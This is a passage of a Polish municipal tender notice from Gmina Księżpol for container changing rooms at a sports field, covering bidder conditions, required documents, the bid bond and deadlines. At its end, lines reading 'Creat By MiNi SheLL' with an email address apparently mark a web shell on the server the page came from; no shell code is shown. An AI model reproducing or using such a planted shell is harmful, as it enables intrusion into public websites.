wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez<br/>zamawiającego warunki udziału<br/>w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym określa się minimalne poziomy zdolności dotyczące:<br/>zamawiający nie określa warunku w w/w. zakresie dla wszystkich części;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>określa się minimalne poziomy zdolności dotyczące:<br/>zamawiający nie określa warunku w w/w. zakresie dla wszystkich części;<br/>3) sytuacji ekonomicznej lub finansowej określa się minimalne poziomy zdolności dotyczące: zamawiający nie określa warunku w w/w. zakresie dla wszystkich części;<br/>4) zdolności technicznej lub zawodowej określa się minimalne poziomy zdolności dotyczące:<br/>a) Wykonawca spełni warunek dotyczący Wykonawcy jeżeli wykaże się wiedzą i doświadczeniem nabytym w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,<br/>wykonał w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył minimum 1 robotę budowlaną<br/>obejmujące swoim zakresem budowę, przebudowę lub remont obiektów kontenerowych o wartości nie mniejszej niż 150<br/>000,00 zł brutto dla tej roboty, w ramach, której wykonano roboty budowlane polegające na montażu obiektu kontenerowego<br/>wraz z wyposażeniem i instalacjami oraz utwardzenie terenu z kostki brukowej, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów<br/>określających, czy te roboty budowlane zostały wykonane należycie zgodnie z zasadami sztuki budowlanej i prawidłowo<br/>ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na<br/>rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>b) niezbędnych kwalifikacji zawodowych osób skierowanych przez wykonawcę do realizacji zamówienia, która będzie<br/>prowadziła nadzór nad wykonaniem prac tj. Wykonawca spełni Warunek dotyczący osób jeśli wykaże dysponowanie<br/>osobami, które zostaną skierowane przez Wykonawcę do realizacji zamówienia legitymującymi się odpowiednimi<br/>kwalifikacjami zawodowymi, uprawnieniami i doświadczeniem odpowiednim do funkcji jaka zostanie im powierzona tj. osobą<br/>pełniąca funkcję kierownika budowy posiadającą doświadczenie zawodowe min. 1 rok w pełnieniu funkcji kierownika<br/>budowy, posiadającego uprawnienia budowlane o specjalności konstrukcyjno-budowlanej oraz kierownika robót wodnokanalizacyjnych<br/>i elektrycznych; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) W celu potwierdzenia<br/>braku podstawa do wykluczenia z udziału w postępowaniu:<br/>a) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275 z późn. zm.), z<br/>innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej – zgodnie z Załącznikiem nr 8 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2) W<br/>celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie zgodnie z<br/>zasadami sztuki budowlanej i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od<br/>niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty –zgodnie z Załącznikiem nr 6 do SWZ;<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z Załącznikiem nr 7 do<br/>SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie, o którym mowa w art.<br/>125 ust. 1 ustawy o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym przez<br/>zamawiającego zgodnie z Załącznikiem nr 2 do SWZ.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców:<br/>1) oświadczenie, o którym mowa w art. 125 ust. 1 ustawy składa każdy z wykonawców. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów;<br/>2) oświadczenie, z którego wynika, które roboty budowlane wykonują poszczególni wykonawcy, o którym mowa w rozdz. 6<br/>pkt. 5 SWZ<br/>3. W przypadku polegania przez wykonawcę na zdolnościach lub sytuacji podmiotów udostępniających zasoby:<br/>1) przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 1, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>2) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów, o którym mowa w rozdz. 9 pkt 1 ppkt 4 SWZ.<br/>4. Dokumenty, z których wynika potwierdzenie umocowania do działania w imieniu wykonawcy<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru, chyba, że zamawiający może je uzyskać za pośrednictwem bezpłatnych i ogólnodostępnych<br/>baz danych, a wykonawca w formularzu oferty wskazał dane umożliwiające dostęp do tych dokumentów w odniesieniu do<br/>wykonawcy, wykonawców wspólnie ubiegających się o zamówienie, jak również w odniesieniu do podmiotów<br/>udostępniających zasoby; b) w przypadku wskazania przez wykonawcę dostępności dokumentów o których mowa w lit. a, pod określonymi adresami<br/>internetowymi ogólnodostępnych i bezpłatnych baz danych, zamawiający może żądać od wykonawcy przedstawienia<br/>tłumaczenia na język polski pobranych samodzielnie przez zamawiającego podmiotowych środków dowodowych lub<br/>dokumentów;<br/>c) pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy, jeżeli w imieniu<br/>wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit. a;<br/>d) pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie osoby działającej w imieniu wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia publicznego, pełnomocnik może być ustanowiony do reprezentowania<br/>wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarciu umowy; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 5 000,00 zł, (słownie zł: pięć tysiące 00/100); <br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2. ustawy Pzp. <br/>3.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego:<br/>Gminy Księżpol ul. Biłgorajska 12, 23-415 Księżpol, <br/>Lubelski Bank Spółdzielczym Oddział w Księżpolu <br/>nr rachunku: 71 9614 0008 2001 0000 0967 0001<br/>z adnotacją „Budowa szatni kontenerowych przy boisku w Majdanie Starym<br/> (Znak sprawy: CUW.251.11.2023)”<br/>5.	Zamawiający zaleca by wpłaty wadium były dokonywane ze znacznym wyprzedzeniem ze względu na powstanie ryzyka opóźnienia związanego z czasem trwania okresu rozliczeń międzybankowych.<br/>6.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 3 ppkt 2-4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. Wadium takie obejmować cały okres związania z ofertą. Treść gwarancji lub poręczenia nie może zawierać postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do gwaranta.<br/>7.	Jako Beneficjenta wadium wnoszonego w formie gwarancji lub poręczeń należy wskazać Gmina Księżpol, ul. Biłgorajska 12, 23-415 Księżpol.<br/>8.	W przypadku, o którym mowa w pkt 6, gwarancja lub poręczenie musi obejmować odpowiedzialność za wszystkie przypadki, o których mowa w art. 98 ust. 6 ustawy Pzp.<br/>9.	Gwarancja lub poręczenie musi zawierać w treści nieodwołalne i bezwarunkowe zobowiązanie wykonawcy dokumentu do zapłaty na rzecz zamawiającego kwoty wadium – płatne na pierwsze pisemne żądanie zamawiającego.<br/>10.	W gwarancji lub poręczeniu musi zostać podany adres e-maila oraz adres pocztowy, na który zamawiający prześle oświadczenie o zwolnieniu wadium.<br/>11.	Dochodzenie roszczenia z tytułu wadium wniesione w formie gwarancji bankowej czy ubezpieczeniowej nie może być utrudnione. W treści gwarancji powinna znaleźć się klauzula stanowiąca, iż wszystkie spory rozstrzygane będą zgodnie z prawem polskim i poddane jurysdykcji sądów polskich, chyba, że wynika to z przepisów prawa. <br/>12.	Warunki zwrotu i zatrzymania wadium są określone w art. 98 ust. 1-5 ustawy Pzp.<br/>13.	Zatrzymanie wadium wraz z odsetkami następuje w przypadku, o którym mowa w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców:<br/>1) oświadczenie, o którym mowa w art.275 ust. 1 ustawy, składa każdy z wykonawców. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów;<br/>2) oświadczenie, z którego wynika, które roboty budowlane wykonują poszczególni wykonawcy, o którym mowa w rozdz. 6 pkt. 5 SWZ<br/>2. W przypadku polegania przez wykonawcę na zdolnościach lub sytuacji podmiotów udostępniających zasoby:<br/>1) przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 1, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim wykonawca powołuje się na jego zasoby ;<br/>2) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów, o którym mowa w rozdz. 9 pkt 1 ppkt 4 SWZ .<br/>3. W przypadku, wspólnego ubiegania się o zamówienie wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo lub inny<br/>dokument potwierdzający umocowanie do reprezentowania wykonawcy winno być załączone do oferty.<br/>4. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu, natomiast spełnienie warunków udziału w postępowaniu wykonawcy wskazują zgodnie z wymaganiami<br/>zamawiającego.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy<br/>i wniesienie zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projekt umowy stanowi Załącznik Nr 9 do SWZ.<br/>2. Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na zasadach określonych w ustawie Pzp,<br/>oraz w sposób i na warunkach określonych w projekcie umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzp.ksiezpol.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-13 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com